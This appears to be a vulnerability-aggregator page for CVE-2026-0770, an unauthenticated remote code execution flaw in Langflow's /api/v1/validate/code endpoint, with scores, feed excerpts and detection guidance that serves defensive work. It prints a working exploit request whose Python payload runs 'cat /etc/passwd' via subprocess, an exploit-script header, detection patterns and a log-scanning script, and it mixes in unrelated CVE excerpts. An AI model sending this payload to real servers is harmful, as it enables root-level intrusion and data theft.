CVE-2026-0770
Published: 2026-01-23
Priority: P191, critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 10.37% (95.2th percentile)
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| langflow | langflow | — | — |
| langflow | langflow | 0 – 1.7.3 | — |
Detection & IOCs
command:
POST /api/v1/validate/code HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Bearer {{token}}
{"code":"\ndef exploit(\n _=( lambda r: (_ for _ in ()).throw(Exception(f\"OUTPUT:\\n{r.stdout}{r.stderr}\")) )(\n __import__('subprocess').run('cat /etc/passwd', shell=True, capture_output=True, text=True)\n )\n):\n pass\n"}
yara
id: CVE-2026-0770
info:
  name: Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
  author: affix
  severity: critical
  tags: cve,cve2026,langflow,rce,authenticated,vuln,vkev
- Monitor for POST requests to /api/v1/validate/code containing '__import__' or 'subprocess' in the JSON body, which is the exploit payload pattern used to achieve RCE via the exec_globals parameter.
- Detect unauthenticated exploitation attempts by monitoring GET requests to /api/v1/auto_login followed immediately by POST requests to /api/v1/validate/code — this two-step sequence is the unauthenticated RCE attack chain.
- Alert on Authorization headers using the misspelled bearer scheme 'Bearare' (not 'Bearer'), which is a fingerprint of the known exploit tool for CVE-2026-0770.
- The Nuclei PoC template matches a successful exploit by checking the HTTP response body for the regex 'root:.*:0:0:' (contents of /etc/passwd), indicating confirmed RCE as root.
- Authentication is not required to exploit this vulnerability; Langflow enables unauthenticated auto-login by default, so a single unauthenticated request is sufficient to obtain a valid session token before proceeding with exploitation.
- The vulnerable endpoint is /api/v1/validate/code; the flaw exists within the handling of the exec_globals parameter provided to the validate endpoint, allowing inclusion of functionality from an untrusted control sphere.
- The exploit works without authentication only when Langflow's auto-login feature is enabled (the default configuration). If auto-login is disabled, credentials are required, reducing the attack surface.
- Successful exploitation results in code execution in the context of root, meaning the Langflow process itself runs as root — a significant privilege escalation risk that amplifies impact.
- The exploit script defaults to the 'id' command if no command is specified, and the PoC template uses 'cat /etc/passwd' — defenders should watch for these specific commands in process trees spawned by Langflow.
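The three request-level indicators above (payload markers in the body, the auto_login-then-validate sequence, and the 'Bearare' scheme) can be checked together over proxy logs. The following is an added example, not code from Langflow or from any of the sources quoted on this page; the JSON-lines log format, its field names (`ts`, `src`, `method`, `path`, `auth`, `body`), the rule labels and the 30-second window are assumptions.

```python
import json
from datetime import datetime, timedelta

VALIDATE = "/api/v1/validate/code"
AUTO_LOGIN = "/api/v1/auto_login"
BODY_MARKERS = ("__import__", "subprocess")   # markers named in the guidance above
CHAIN_WINDOW = timedelta(seconds=30)          # assumption: tune per environment

# Constructed sample records (one JSON object per line), not real traffic.
SAMPLE_LOG = r"""{"ts": "2026-02-01T10:00:00", "src": "203.0.113.7", "method": "GET", "path": "/api/v1/auto_login", "auth": "", "body": ""}
{"ts": "2026-02-01T10:00:01", "src": "203.0.113.7", "method": "POST", "path": "/api/v1/validate/code", "auth": "Bearare constructed-token", "body": "{\"code\": \"def f(_=__import__('subprocess')): pass\"}"}
{"ts": "2026-02-01T10:05:00", "src": "198.51.100.20", "method": "POST", "path": "/api/v1/validate/code", "auth": "Bearer constructed-token", "body": "{\"code\": \"def add(a, b): return a + b\"}"}
{"ts": "2026-02-01T10:10:00", "src": "192.0.2.50", "method": "GET", "path": "/api/v1/auto_login", "auth": "", "body": ""}
{"ts": "2026-02-01T10:20:00", "src": "192.0.2.50", "method": "POST", "path": "/api/v1/validate/code", "auth": "Bearer constructed-token", "body": "{\"code\": \"x = 1\"}"}
"""

def detect(lines):
    """Return (timestamp, source, rule) findings for the CVE-2026-0770 indicators."""
    findings = []
    last_auto_login = {}  # source address -> time of its most recent auto_login GET
    for line in lines:
        if not line.strip():
            continue
        rec = json.loads(line)
        ts = datetime.fromisoformat(rec["ts"])
        src, method = rec["src"], rec["method"].upper()
        path = rec["path"].split("?", 1)[0].rstrip("/")
        # Indicator: misspelled Authorization scheme used by the known exploit tool.
        if rec.get("auth", "").split(" ", 1)[0] == "Bearare":
            findings.append((rec["ts"], src, "misspelled-bearer-scheme"))
        if method == "GET" and path == AUTO_LOGIN:
            last_auto_login[src] = ts
        if method == "POST" and path == VALIDATE:
            # Indicator: payload markers in the request body.
            if any(marker in rec.get("body", "") for marker in BODY_MARKERS):
                findings.append((rec["ts"], src, "validate-code-payload-marker"))
            # Indicator: auto_login followed shortly by validate/code from the same source.
            seen = last_auto_login.get(src)
            if seen is not None and timedelta(0) <= ts - seen <= CHAIN_WINDOW:
                findings.append((rec["ts"], src, "auto-login-then-validate"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(*finding)
```

The body-marker rule only covers the payload pattern described on this page; the sequence rule does not depend on payload content and still fires when the body is not logged.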
CVSS provenance
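| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_redhat | | 6.8 | MEDIUM | |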
OSV
Langflow affected by Remote Code Execution via validate_code() exec()
osv·2026-01-23
CVE-2026-0770 [HIGH] Langflow affected by Remote Code Execution via validate_code() exec()
GHSA
Langflow affected by Remote Code Execution via validate_code() exec()
ghsa·2026-01-23
CVE-2026-0770 [HIGH] CWE-829 Langflow affected by Remote Code Execution via validate_code() exec()
VulnCheck
langflow langflow Inclusion of Functionality from Untrusted Control Sphere
vulncheck·2026·CVSS 9.8
CVE-2026-0770 [CRITICAL] langflow langflow Inclusion of Functionality from Untrusted Control Sphere
Affected: langflow langflow
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product
Red Hat
cups: OpenPrinting CUPS: Denial of Service via path traversal in RSS notifier
vendor_redhat·2026-04-03·CVSS 6.5
CVE-2026-34978 [MEDIUM] CWE-22 cups: OpenPrinting CUPS: Denial of Service via path traversal in RSS notifier
OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.16 and prior, the RSS notifier allows .. path traversal in notify-recipient-uri (e.g., rss:///../job.cache), letting a remote IPP client write RSS XML bytes outside CacheDir/rss (anywhere that is lp-writable). In particular, because CacheDir is group-writable by default (typically root:lp and mode 0770), the notifier (running as lp) can replace root-managed state files via temp-file + rename(). This PoC clobbers CacheDir/job.cache with RSS XML, and after restarting cupsd the scheduler fails to parse the job cache and previously queued jobs disappear. At time of publication, there are no publicly a
No detection rules found.
Exploit-DB
Langflow 1.3.0 - Remote Code Execution
exploitdb·2026-05-29·CVSS 9.8
CVE-2026-0770 [CRITICAL] Langflow 1.3.0 - Remote Code Execution
---
# Exploit Title: Langflow 1.3.0 - Remote Code Execution
# Fofa-dork: title="Langflow"
# Shodan-dork: title:"Langflow"
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.langflow.org/
# Software Link: https://github.com/langflow-ai/langflow
# Version: 1.2.0
# Tested on: Debian
# CVE : CVE-2026-0770
# Description: Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.
# Usage: CVE-2026-0770.py -u 127.0.0.1 [-l USERNAME] [-p PASSWORD] [-c COMMAND]
import httpx
import asyncio
import subprocess
import json
import sys
im
Nuclei
Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
nuclei·CVSS 9.8
CVE-2026-0770 [CRITICAL] Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.
Template:
id: CVE-2026-0770
info:
  name: Langflow < 1.3.0 - Remote Code Execution via validate_code() exec()
  author: affix
  severity: critical
  description: |
    Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication.
  impact: |
    Remote attackers can execute arbitrary code as
Hackernews
Unpatched Langflow Flaw CVE-2026-5027 Exploited for Unauthenticated RCE
blogs_hackernews·2026-06-10·CVSS 8.8
CVE-2026-5027 [HIGH] Unpatched Langflow Flaw CVE-2026-5027 Exploited for Unauthenticated RCE
## Unpatched Langflow Flaw CVE-2026-5027 Exploited for Unauthenticated RCE
A high-severity unpatched security flaw in Langflow, an open-source low-code platform to build artificial intelligence (AI) applications, has come under active exploitation in the wild, according to findings from VulnCheck.
The vulnerability in question is CVE-2026-5027 (CVSS score: 8.8), a case of path traversal that could allow an attacker to write files to arbitrary locations.
"The 'POST /api/v2/files' endpoint does not sanitize the 'filename' parameter from the multipart form data, allowing an attacker to write files to arbitrary locations on the fi
Bleepingcomputer
Path traversal flaw in AI dev platform Langflow exploited in attacks
blogs_bleepingcomputer·2026-06-10·CVSS 9.8
CVE-2026-5027 [CRITICAL] Path traversal flaw in AI dev platform Langflow exploited in attacks
## Path traversal flaw in AI dev platform Langflow exploited in attacks
## Bill Toulas
CVE-2026-5027 is a high-severity path traversal flaw in Langflow's file upload functionality that fails to properly sanitize user-supplied filenames.
"The 'POST /api/v2/files' endpoint does not sanitize the 'filename' parameter from the multipart form data, allowing an attacker to write files to arbitrary locations on the filesystem using path traversal sequences ('../')," explains Tenable, which discovered the flaw at the start of the year.
Tenable publicly disclosed the issue on March 27, 2026, more than two months after initially reporting it to the Langflow team without receiving a response.
Although Tenable did not mention a fix in its advisory, Snyk Security reported on March 30, 2026, that t
Wiz
CVE-2026-0770 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-0770 [CRITICAL] CVE-2026-0770 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0770 :
Homebrew vulnerability analysis and mitigation
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
Source : NVD
## 9.8
Score
Published January 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Homebrew
LangFlow
Has Public
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
Wiz
CVE-2026-34978 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34978 [MEDIUM] CVE-2026-34978 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34978 :
OpenPrinting CUPS vulnerability analysis and mitigation
OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.16 and prior, the RSS notifier allows .. path traversal in notify-recipient-uri (e.g., rss:///../job.cache), letting a remote IPP client write RSS XML bytes outside CacheDir/rss (anywhere that is lp-writable). In particular, because CacheDir is group-writable by default (typically root:lp and mode 0770), the notifier (running as lp) can replace root-managed state files via temp-file + rename(). This PoC clobbers CacheDir/job.cache with RSS XML, and after restarting cupsd the scheduler fails to parse the job cache and previously queued jobs disappear. At time of publication, there are no publicly av
Wiz
CVE-2026-23893 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-23893 [MEDIUM] CVE-2026-23893 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23893 :
NixOS vulnerability analysis and mitigation
openCryptoki is a PKCS#11 library and provides tooling for Linux and AIX. Versions 2.3.2 and above are vulnerable to symlink-following when running in privileged contexts. A token-group user can redirect file operations to arbitrary filesystem targets by planting symlinks in group-writable token directories, resulting in privilege escalation or data exposure. Token and lock directories are 0770 (group-writable for token users), so any token-group member can plant files and symlinks inside them. When run as root, the base code handling token directory file access, as well as several openCryptoki tools used for administrative purposes, may reset ownership or permissions on existing files inside the token directories. An attack